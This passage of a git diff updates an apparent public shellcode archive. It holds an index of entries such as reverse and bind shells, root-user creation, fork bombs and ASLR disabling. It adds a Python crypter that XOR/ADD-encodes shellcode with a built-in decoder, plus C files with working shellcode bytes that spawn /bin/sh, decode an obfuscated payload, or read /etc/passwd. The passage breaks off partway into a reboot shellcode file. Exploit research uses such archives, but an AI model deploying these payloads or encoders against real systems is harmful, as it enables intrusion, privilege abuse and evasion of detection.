 41375,shellcodes/linux/41375.c,"Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,shellcode,linux
-41381,shellcodes/windows_x86/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
+41381,shellcodes/windows_x86/41381.c,"Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",shellcode,windows_x86
 41398,shellcodes/linux_x86-64/41398.nasm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",shellcode,linux_x86-64
 41403,shellcodes/linux_x86/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,shellcode,linux_x86
-41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
-41467,shellcodes/windows_x86/41467.c,"Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
+41439,shellcodes/linux_x86-64/41439.c,"Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes)",2017-02-23,odzhancode,shellcode,linux_x86-64
+41467,shellcodes/windows_x86/41467.c,"Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes)",2017-02-26,lu0xheap,shellcode,windows_x86
 41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64
 41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64
-41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
+41481,shellcodes/windows_x86/41481.asm,"Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86
 41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
 41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64
 41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
 41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64
-41581,shellcodes/windows_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
+41581,shellcodes/windows_x86/41581.c,"Windows/x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86
 43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86
 43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86
 43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha
@@ -765,7 +804,7 @@ id,file,description,date,author,type,platform
 43512,shellcodes/irix/43512.c,"IRIX - stdin-read Shellcode (40 bytes)",2009-01-01,scut/teso,shellcode,irix
 43520,shellcodes/arm/43520.c,"Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)",2017-03-31,dummys,shellcode,arm
 43530,shellcodes/arm/43530.c,"Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)",2015-03-02,"Osanda Malith Jayathissa",shellcode,arm
-43531,shellcodes/arm/43531.c,"Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
+43531,shellcodes/arm/43531.c,"Linux/ARM - chmod( /etc/passwd 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43532,shellcodes/arm/43532.c,"Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43533,shellcodes/arm/43533.c,"Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes)",2013-09-04,gunslinger_,shellcode,arm
 43534,shellcodes/arm/43534.c,"Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes)",2010-08-31,"Jonathan Salwan",shellcode,arm
@@ -776,46 +815,47 @@ id,file,description,date,author,type,platform
 43545,shellcodes/linux_sparc/43545.c,"Linux/SPARC - setreuid(0_0) + execve(/bin/sh) Shellcode (64 bytes)",2009-01-01,anathema,shellcode,linux_sparc
 43541,shellcodes/superh_sh4/43541.c,"Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes)",2011-06-22,"Florian Gaultier",shellcode,superh_sh4
 43542,shellcodes/superh_sh4/43542.c,"Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes)",2009-01-01,Dad_,shellcode,superh_sh4
-43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + standard execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
+43546,shellcodes/linux_sparc/43546.c,"Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes)",2009-01-01,"Michel Kaempf",shellcode,linux_sparc
 43549,shellcodes/linux_x86-64/43549.c,"Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)",2009-01-01,Dad_,shellcode,linux_x86-64
 43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
 43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64
 43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
 43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64
-43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
+43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) +  Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
 43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
 43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
 43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
 43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64
 43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64
 43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64
-41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
+41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86
 41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86
 41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86
+43734,shellcodes/linux_x86/43734.c,"Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86
 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86
 41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
 41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4)",2017-03-29,WangYihang,shellcode,linux_x86
-41827,shellcodes/windows_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
+41827,shellcodes/windows_x86-64/41827.txt,"Windows/x86-64 (10) - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
 41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
-41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
+41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
 41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86
 41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
-42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
+42016,shellcodes/windows/42016.asm,"Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
 42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
-42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
+42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
 42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
 42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
 42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
 42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
-42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
+42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
 42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
 42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
 42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
 42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86
 42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
 42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
-42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
+42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir(evil) Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
 42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
-42992,shellcodes/windows_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
+42992,shellcodes/windows_x86-64/42992.c,"Windows/x86-64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86
diff --git a/shellcodes/windows_x86/14014.pl b/shellcodes/generator/14014.pl
similarity index 100%
rename from shellcodes/windows_x86/14014.pl
rename to shellcodes/generator/14014.pl
diff --git a/shellcodes/generator/43741.py b/shellcodes/generator/43741.py
new file mode 100755
index 000000000..616afe47d
--- /dev/null
+++ b/shellcodes/generator/43741.py
@@ -0,0 +1,154 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+#
+# Uzumaki Shellcode Crypter - Python Language
+# Copyright (C) 2013 Geyslan G. Bem, Hacking bits
+#
+#   http://hackingbits.com
+#   geyslan@gmail.com
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+'''
+   uzumaki_crypter
+
+   * uses the uzumaki cipher, a custom stream cipher algorithm ( (XOR [static] and XOR [pseudorandom]), ADD [static] )
+
+
+   # ./uzumaki_crypter.py -h
+   # ./uzumaki_crypter.py -a 03 -x f2 -s $'\x31\xc9\xf7\xe1...\x80'
+
+'''
+
+import sys
+import getopt
+import string
+
+
+def usage ():
+    usage = """
+  -a --add            Byte to be used with bitwise ADD (one byte in hex format)
+                        Default is 01
+                        Eg. -a 2f
+                            --add 1f
+
+  -x --xor            Byte to be used with bitwise XOR (one byte in hex format)
+                        Default is cc
+                        Eg. -x f2
+                            --xor aa
+
+  -s --shellcode      The shellcode to be crypted with the uzumaki cipher
+                        Eg. -s $'\\xcd\\x80'
+                            --shellcode `printf "\\xcc\\x90"`
+
+  -h --help           This help
+"""
+    print(usage)
+
+def main():
+    addByte = "01"
+    xorByte = "cc"
+    shellcode = ""    
+
+    try:
+        opts, args = getopt.getopt(sys.argv[1:], "ha:x:s:")
+                
+    except getopt.GetoptError as err:
+        print(err)
+        usage()
+        sys.exit()
+
+
+    for o, a in opts:
+
+        if o in ("-h", "--help"):
+            usage()
+            sys.exit()
+
+        elif o in ("-a", "--add"):
+            if (len(a) != 2 or not all(h in string.hexdigits for h in a)):
+                print("  ADD byte has to be in hex format. Eg. -a 3f\n")
+                sys.exit()            
+            addByte = a
+            
+        elif o in ("-x", "--xor"):
+            if (len(a) != 2 or not all(h in string.hexdigits for h in a)):
+                print("  XOR byte has to be in hex format. Eg. -x f1\n")
+                sys.exit()
+            xorByte = a
+
+        elif o in ("-s", "--shellcode"):
+            shellcode = a.encode("utf_8", "surrogateescape")
+
+
+    if (not shellcode):
+        print("  Is necessary to inform a shellcode. Eg. -s $'\\xcd\\x80'\n")
+        sys.exit()
+
+    
+    crypted = ""
+    crypted2 = ""
+    crypted3 = ""
+    crypted4 = ""
+    tempbyte = 0x00
+    
+    for x in range(len(shellcode)):
+        if (x == 0):
+            tempbyte = shellcode[x]
+        else:
+            tempbyte = ((shellcode[x-1] ^ (shellcode[x] ^ int("0x" + xorByte, 16) )) + int("0x" + addByte, 16))
+        if (tempbyte > 0xff or tempbyte <= 0x00):
+            print("  A crypted byte value cannot be higher than 0xff or equal to 0x00. Please change the value of the option 'ADD' or/and of the option 'XOR'.\n")
+            sys.exit()
+        crypted += "\\x%02x" % tempbyte
+
+    crypted2 = crypted.replace("\\x", ",0x")[1:]
+
+    crypted3 += r"\x29\xc9\x74\x14\x5e\xb1"
+    crypted3 += r"\x%02x" % (len(shellcode) - 1)
+    crypted3 += r"\x46\x8b\x06\x83\xe8"
+    crypted3 += r"\x" + addByte
+    crypted3 += r"\x34"
+    crypted3 += r"\x" + xorByte 
+    crypted3 += r"\x32\x46\xff\x88\x06\xe2\xf1\xeb\x05\xe8\xe7\xff\xff\xff"
+    crypted3 += crypted
+
+    crypted4 = crypted3.replace("\\x", ",0x")[1:]
+
+    crypted = '"' + crypted + '";'
+    crypted3 = '"'+ crypted3 + '";'
+
+    print("Uzumaki Shellcode Crypter - Swirling Everything")
+    print("http://hackingbits.com")
+    print("https://github.com/geyslan/SLAE.git")
+    print("License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>\n\n")
+
+    print("Crypted shellcode:\n")
+    print(crypted)
+    print()
+    print(crypted2)
+    print("\n\n")
+
+    print("Crypted shellcode with decrypter built-in:\n")
+    print(crypted3)
+    print()
+    print(crypted4)
+    print("\n\n")
+
+    print("Length: %d" % len(bytearray(shellcode)))
+    print("Length with decrypter: %d" % ((len(crypted3) - 2) / 4))
+
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/shellcodes/linux_x86/36921.c b/shellcodes/linux_x86/36921.c
index 404f7b08f..f12b142a3 100644
--- a/shellcodes/linux_x86/36921.c
+++ b/shellcodes/linux_x86/36921.c
@@ -4,7 +4,7 @@
 # Shellcode Author: Oleg Boytsev
 # Tested on: Debian GNU/Linux 7/i686
 # Shellcode Length: 58
-# Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode
+# EDB Note ~ Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode
 
 global _start
 section .text
diff --git a/shellcodes/linux_x86/43701.c b/shellcodes/linux_x86/43701.c
deleted file mode 100644
index 79957e284..000000000
--- a/shellcodes/linux_x86/43701.c
+++ /dev/null
@@ -1,32 +0,0 @@
-/*
- Title: linux/x86 Shellcode execve ("/bin/sh") - 21 Bytes
- Date     : 10 Feb 2011
- Author   : kernel_panik
- Thanks   : cOokie, agix, antrhacks
-*/
-
-/*
- xor ecx, ecx
- mul ecx
- push ecx
- push 0x68732f2f   ;; hs//
- push 0x6e69622f   ;; nib/
- mov ebx, esp
- mov al, 11
- int 0x80
-*/
-
-
-#include <stdio.h>
-#include <string.h>
-
-char code[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f"
-              "\x73\x68\x68\x2f\x62\x69\x6e\x89"
-              "\xe3\xb0\x0b\xcd\x80";
-
-int main(int argc, char **argv)
-{
- printf ("Shellcode length : %d bytes\n", strlen (code));
- int(*f)()=(int(*)())code;
- f();
-}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43734.c b/shellcodes/linux_x86/43734.c
new file mode 100644
index 000000000..63978935f
--- /dev/null
+++ b/shellcodes/linux_x86/43734.c
@@ -0,0 +1,86 @@
+/*
+
+ Insertion Decoder Shellcode - C Language - Linux/x86
+ Copyright (C) 2013 Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+*/
+
+/*
+
+   insertion_decoder_shellcode
+
+  * decoder has 33 bytes (the final amount depends on the shellcode length plus garbage bytes)
+  * null-free
+  * decodes any pattern of garbage insertion
+      Eg: True Byte = X, Garbage Byte = _
+           _ X _ X _ ...
+           X _ _ X X ...
+           X X X _ _ ... 
+
+
+   # gcc -m32 -fno-stack-protector -z execstack insertion_decoder_shellcode.c -o insertion_decoder_shellcode
+
+   Testing
+   # ./insertion_decoder_shellcode
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+
+// Shellcode Decoder (33 bytes)
+"\xeb\x1a\x5e\x8d\x3e\x31\xc9\x8b\x1c\x0e"
+"\x41\x66\x81\xfb"
+"\xf1\xf1"        // <- End Signature
+"\x74\x0f\x80\xfb"
+"\x3f"            // <- Garbage Byte
+"\x74\xf0\x88\x1f\x47\xeb\xeb\xe8\xe1\xff"
+"\xff\xff"
+
+// Encoded shellcode (length depends of the shellcode plus garbage bytes)
+"\x3f\x3f\x3f\x31\x3f\xc9\x3f\xf7\xe1\x3f"
+"\xb0\x0b\x3f\x51\x68\x3f\x2f\x2f\x3f\x73"
+"\x68\x3f\x68\x2f\x3f\x62\x69\x3f\x6e\x89"
+"\x3f\xe3\xcd\x3f\x80\xf1\xf1";
+
+
+main ()
+{
+
+        // When contains null bytes, printf will show a wrong shellcode length.
+
+	printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+	// Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+	__asm__ ("movl $0xffffffff, %eax\n\t"
+		 "movl %eax, %ebx\n\t"
+		 "movl %eax, %ecx\n\t"
+		 "movl %eax, %edx\n\t"
+		 "movl %eax, %esi\n\t"
+		 "movl %eax, %edi\n\t"
+		 "movl %eax, %ebp\n\t"
+
+		 // Calling the shellcode
+		 "call shellcode");
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43735.c b/shellcodes/linux_x86/43735.c
new file mode 100644
index 000000000..85f9f29c3
--- /dev/null
+++ b/shellcodes/linux_x86/43735.c
@@ -0,0 +1,70 @@
+/*
+
+ Tiny Execve sh Shellcode - C Language - Linux/x86
+ Copyright (C) 2013 Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program.  If not, see <http://www.gnu.org/licenses/>
+
+*/
+
+/*
+
+   tiny_execve_sh_shellcode
+
+  * 21 bytes
+  * null-free
+
+
+   # gcc -m32 -fno-stack-protector -z execstack tiny_execve_sh_shellcode.c -o tiny_execve_sh_shellcode
+
+   Testing
+   # ./tiny_execve_sh_shellcode
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+
+"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
+"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
+"\x80";
+
+
+main ()
+{
+
+        // When contains null bytes, printf will show a wrong shellcode length.
+
+	printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+	// Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+	__asm__ ("movl $0xffffffff, %eax\n\t"
+		 "movl %eax, %ebx\n\t"
+		 "movl %eax, %ecx\n\t"
+		 "movl %eax, %edx\n\t"
+		 "movl %eax, %esi\n\t"
+		 "movl %eax, %edi\n\t"
+		 "movl %eax, %ebp\n\t"
+
+		 // Calling the shellcode
+		 "call shellcode");
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43736.c b/shellcodes/linux_x86/43736.c
new file mode 100644
index 000000000..d0b73bcd8
--- /dev/null
+++ b/shellcodes/linux_x86/43736.c
@@ -0,0 +1,74 @@
+/*
+
+   Tiny Read File Shellcode - C Language - Linux/x86
+   Copyright (C) 2013 Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+   This program is free software: you can redistribute it and/or modify
+   it under the terms of the GNU General Public License as published by
+   the Free Software Foundation, either version 3 of the License, or
+   (at your option) any later version.
+
+   This program is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+*/
+
+/*
+
+   tiny_read_file_shellcode
+
+   * 51 bytes
+   * null-free
+   * read 4096 bytes from /etc/passwd file
+
+
+   # gcc -m32 -fno-stack-protector -z execstack tiny_read_file_shellcode.c -o tiny_read_file_shellcode
+
+   Testing
+   # ./tiny_read_file_shellcode
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char shellcode[] = \
+
+              "\x31\xc9\xf7\xe1\xb0\x05\x51\x68\x73\x73"
+              "\x77\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f"
+              "\x65\x74\x89\xe3\xcd\x80\x93\x91\xb0\x03"
+              "\x31\xd2\x66\xba\xff\x0f\x42\xcd\x80\x92"
+              "\x31\xc0\xb0\x04\xb3\x01\xcd\x80\x93\xcd"
+              "\x80";
+
+
+main ()
+{
+
+    // When contains null bytes, printf will show a wrong shellcode length.
+
+    printf("Shellcode Length:  %d\n", strlen(shellcode));
+
+    // Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+    __asm__ ("movl $0xffffffff, %eax\n\t"
+            "movl %eax, %ebx\n\t"
+            "movl %eax, %ecx\n\t"
+            "movl %eax, %edx\n\t"
+            "movl %eax, %esi\n\t"
+            "movl %eax, %edi\n\t"
+            "movl %eax, %ebp\n\t"
+
+            // Calling the shellcode
+            "call shellcode");
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43737.c b/shellcodes/linux_x86/43737.c
new file mode 100644
index 000000000..ac292c2b6
--- /dev/null
+++ b/shellcodes/linux_x86/43737.c
@@ -0,0 +1,75 @@
+/*
+
+   Mutated Reboot Shellcode - C Language - Linux/x86
+   Copyright (C) 2013 Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+   This program is free software: you can redistribute it and/or modify
+   it under the terms of the GNU General Public License as published by
+   the Free Software Foundation, either version 3 of the License, or
+   (at your option) any later version.
+
+   This program is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
